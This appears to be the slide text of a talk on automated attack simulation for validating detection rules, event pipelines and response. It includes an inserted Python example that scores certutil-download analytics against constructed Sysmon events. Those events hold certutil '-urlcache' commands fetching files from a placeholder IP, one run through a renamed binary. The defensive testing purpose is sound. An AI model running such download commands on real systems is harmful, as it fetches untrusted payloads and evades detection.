Demo 1: https://www.youtube.com/watch?v=cpnrCkj1308
Demo 2: https://www.youtube.com/watch?v=JmtjtiI3-fc
Demo 2 1/2: https://www.youtube.com/watch?v=KRdNbYbJSiI
Demo 3: https://www.youtube.com/watch?v=6gB-upKXTZ4
Automated adversary simulation is often perceived as a hard, dangerous and complicated program to implement and run. Fear no longer: our methodology and tooling let you test and measure your defenses throughout your production environment, exercising not only the resilience of your detection rules but the whole event pipeline and your team's response procedures. In this talk we share the open source tools we built and the methodology we use, which will let the audience hit the ground running at nearly no cost.
4. Detection Program
● You’ve spent a lot of money constructing a solid defense program
● Ingesting, transforming and indexing network/endpoint telemetry
● Buying all kinds of amazing tools: AI, ML, CTI, etc.
● Creating detection logic
● It takes effort to deploy a program, but once you deploy it ….
@olafhartong @mvelazco
6. Problem Statement
● How do you know if your event pipeline is working?
● Did that GPO change last week break anything in terms of security?
● Is that detection you built last year still working?
● How do you know if your detection vendor is doing what they are supposed to?
● How can you convince your stakeholders you’re in control?
● How do you know if your detection is resilient?
9. Automated attack simulation
What is it
● A valuable way to validate your environment on a continuous basis
● It allows you to measure the progress of your effort
● It exposes unintended security implications of an ever-changing environment
● A cost-effective methodology
● A means to generate sample data
What is it NOT
● A red team replacement
● Pentesting
● Skynet
● Impacting continuity (by design)
● The new holy grail or buzzword
11. Integration into your detection engineering process
1. Hypothesize
•Develop general theories
•Use threat intelligence, ATT&CK, industry reports and internal knowledge
•Develop interesting queries
•Determine the timespan
2. Investigate & research
•Find ways the technique can be executed: scripts/samples/procedures
•Determine what data you will need
•Investigate what it looks like when the technique has been executed
•Develop initial validation script options
3. Develop analytics
•Build a set of analytics
•Cast a wide net, then narrow it
•Be efficient
4. Analyze and implement
•Review results
•Enrich where possible
•Tune the query if needed, keep it resilient
•Implement analytics in production
•Implement the validation script
5. Report and revise
•Report to IR/TI/Management
•Measure efficiency
•Measure scope
12. End to end
Test your detection logic, data pipeline and mitigations anywhere... in production
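Slides 11 and 12 describe the loop (run a technique with a validation script, then check the telemetry and the analytic) without showing what one run looks like. The following is an added example and is not code from the talk, the ThreatHunting app or any of the speakers' tools. It stands in for the real setup with an in-memory list of Sysmon-style process-creation records instead of Splunk; the host name, timestamps, URL, command lines and both analytics are constructed for illustration. The point it demonstrates is the end-to-end separation from slide 12: a run is scored first on whether any telemetry from the host arrived in the expected timespan (pipeline) and only then on whether the analytic fired (detection), and a second, tuned analytic shows the "keep it resilient" step of slide 11 by also matching on Sysmon's OriginalFileName so a renamed binary is still caught.

```python
"""
Added example (not the talk's own tooling): a minimal end-to-end validation
run for one detection. A validation script executes a technique on a host at
a known time; afterwards we check, separately, that (1) telemetry from that
host reached the event store inside the expected timespan and (2) the
analytic fired on it. A silent pipeline and a broken detection look the same
on a dashboard but need different fixes, so the verdict keeps them apart.

All data below is constructed: the Sysmon-style events, host name, URL and
the two analytics are assumptions for illustration, not from the page.
"""
from datetime import datetime, timedelta, timezone

# Execution time recorded by the (hypothetical) validation script.
T0 = datetime(2019, 5, 1, 10, 0, 0, tzinfo=timezone.utc)

# Constructed Sysmon Event ID 1 (process creation) records as they might be
# indexed after the script ran certutil twice: once plainly, once as a
# renamed copy. The third event is unrelated noise from the same host.
SAMPLE_EVENTS = [
    {"EventID": 1, "UtcTime": T0 + timedelta(seconds=4), "Computer": "WS01",
     "Image": "C:\\Windows\\System32\\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.5/a.txt a.txt"},
    {"EventID": 1, "UtcTime": T0 + timedelta(seconds=31), "Computer": "WS01",
     "Image": "C:\\Users\\Public\\svc.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "svc.exe -URLCACHE -f http://203.0.113.5/b.txt b.txt"},
    {"EventID": 1, "UtcTime": T0 + timedelta(seconds=40), "Computer": "WS01",
     "Image": "C:\\Windows\\System32\\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe"},
]


def certutil_download_naive(event):
    """First-cut analytic: match on the image path only. Misses renamed copies."""
    return (event.get("EventID") == 1
            and event.get("Image", "").lower().endswith("\\certutil.exe")
            and "urlcache" in event.get("CommandLine", "").lower())


def certutil_download_resilient(event):
    """Tuned analytic: also use Sysmon's OriginalFileName (taken from the PE
    header), so a renamed binary still matches, and ignore switch casing."""
    if event.get("EventID") != 1:
        return False
    names = (event.get("Image", "").lower(), event.get("OriginalFileName", "").lower())
    cmd = event.get("CommandLine", "").lower()
    return any(n.endswith("certutil.exe") for n in names) and "urlcache" in cmd and "http" in cmd


def validate(events, analytic, host, started, window=timedelta(minutes=5), expected_hits=1):
    """Score one validation run. Verdicts: 'PASS', 'PIPELINE' (no telemetry at
    all from the host in the window) or 'DETECTION' (telemetry arrived but the
    analytic fired fewer times than the script's executions)."""
    in_window = [e for e in events
                 if e["Computer"] == host and started <= e["UtcTime"] <= started + window]
    hits = [e for e in in_window if analytic(e)]
    if not in_window:
        verdict = "PIPELINE"
    elif len(hits) < expected_hits:
        verdict = "DETECTION"
    else:
        verdict = "PASS"
    first = min((e["UtcTime"] for e in hits), default=None)
    return {"verdict": verdict, "events_seen": len(in_window), "hits": len(hits),
            "seconds_to_first_hit": (first - started).total_seconds() if first else None}


def run_suite(events, host, started):
    """Run every analytic against the same telemetry. expected_hits=2 because
    the script executed two variants; the result is the report for IR/TI/management."""
    analytics = [("certutil_download_naive", certutil_download_naive),
                 ("certutil_download_resilient", certutil_download_resilient)]
    return {name: validate(events, fn, host, started, expected_hits=2) for name, fn in analytics}


if __name__ == "__main__":
    for name, result in run_suite(SAMPLE_EVENTS, "WS01", T0).items():
        print(f"{name:30s} {result}")
    # The case no detection dashboard will show: telemetry never arrived.
    print("empty store ->", validate([], certutil_download_resilient, "WS01", T0)["verdict"])
```

Run as a script it prints a DETECTION verdict for the naive analytic (it caught one of the two executions), a PASS for the tuned one, and PIPELINE for an empty store. In a real deployment the event list would be the result of a Splunk search scoped to the host and timespan the validation script logged, and the same three verdicts map directly onto the slide's questions: pipeline broken, detection broken, or in control.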
13. Requirements
✘ A defensive capability
✘ Ideally, some knowledge of the threats your company is facing
✘ Tools to execute and orchestrate these crafted scenarios
✘ An adversarial mindset
✘ Management buy-in, or say sorry later :)
✘ In case of an MSSP, get their involvement
24. Threat Hunting App
✘ Free Splunk application
✘ Very graphically oriented
✘ Built for threat hunting and detection engineering
https://github.com/olafhartong/ThreatHunting
25. Threat Hunting App
✘ Loads of detections for attack techniques within Windows environments
✘ Utilizes Sysmon and native Windows Event Log data
✘ MITRE ATT&CK focused
✘ Goal: create an investigative workflow for hunters and provide as much context as possible
https://github.com/olafhartong/ThreatHunting
36. Takeaways
Huge value in terms of control and reportability
It does not have to be an expensive program
Build a way of testing into your detection engineering efforts
Use it for developing new detections or improving your current analytics
It should not be a grading mechanism